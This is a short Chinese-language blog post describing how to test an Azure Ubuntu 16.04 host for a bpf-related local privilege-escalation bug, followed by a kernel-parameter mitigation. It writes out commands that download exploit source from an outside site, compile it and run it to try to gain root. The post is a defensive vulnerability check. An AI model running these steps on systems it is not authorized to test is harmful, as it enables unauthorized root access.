开源是一种精神,分享是一种美德!

检测azure云 ubuntu16.04 提权漏洞

Linux W•X 474℃

对azure云ubuntu16.04版本做漏洞提权检测

1 .下载验证脚本

#  wget  http://cyseclabs.com/exploits/upstream44.c

2. 编译此文件,得到可执行文件

#  gcc -o upstream44  upstream44.c

得到可执行文件: upstream44

普通用户执行文件

#  ./upstream44   

如果执行成功,会得到root权限,在azure上执行此文件返回结果:error: Permission denie(没有权限),证明此漏洞修复。

缓解措施

可以通过修改内核参数来限制普通用户使用bpf(2)系统调用的方式以规避风险。

修改命令如下

echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled

 

ubuntu16.04

转载请注明:LINUX! » 检测azure云 ubuntu16.04 提权漏洞

喜欢 (0)